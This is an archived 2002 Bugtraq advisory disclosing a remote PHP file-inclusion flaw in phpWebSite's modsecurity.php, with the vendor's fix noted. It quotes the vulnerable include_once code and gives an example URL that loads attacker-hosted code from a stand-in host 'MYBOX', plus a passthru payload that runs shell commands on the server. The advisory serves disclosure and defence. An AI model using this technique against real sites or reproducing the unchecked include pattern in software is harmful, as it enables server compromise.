[27156] in bugtraq
PHP source injection in phpWebSite
daemon@ATHENA.MIT.EDU (Tim Vandermeersch)
Mon Sep 23 14:08:05 2002
Message-ID: <002401c26293$529e3610$397ba8c0@qber66>
From: "Tim Vandermeersch" <Tim.Vandermeersch@pandora.be>
To: <bugtraq@securityfocus.com>
Date: Mon, 23 Sep 2002 01:53:59 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
--------------------------------------
| PHP source injection in phpWebSite |
--------------------------------------
Product Description
===================
phpWebSite is written in the PHP Programming Language,
making it ideal for developers to write customized
plug-ins. PHP is a server side programming language
that is simple, cross-platform, and fast. It can be
found at http://phpwebsite.appstate.edu
Tested version
==============
Stable - 0.8.2 (modsecurity.php version < 1.10)
The Problem
===========
phpWebSite commes with a file called
modsecurity.php, and looks like this:
-------- modsecurity.php --------
<?php
global $inc_prefix;
if(!$inc_prefix) {
...
}
...
include_once($inc_prefix."htmlheader.php");
?>
----------------------------------
If someone request a URL like
http://SERVER/modsecurity.php?inc_prefix=http://MYBOX/,
the htmlheader.php file from MYBOX would be included,
and the attacker would be able to include any code he
wants.
Examples
========
http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/
--- htmlheader.php ---
<? passthru("/bin/ls") ?>
----------------------
Output: dir listing of the current dierctory
Sollution
=========
I informed the vendor and they released a new version (1.11)
of the modsecurity.php file wich is avaiable from:
http://res1.stddev.appstate.edu/horde/chora/cvs.php/phpwebsite
A new version (0.8.3) is released so this vulnerability so new users will
never have a modsecurity.php file older then version 1.11
------------------------------
Tim Vandermeersch
Tim.Vandermeersch@pandora.be
http://users.pandora.be/tim/
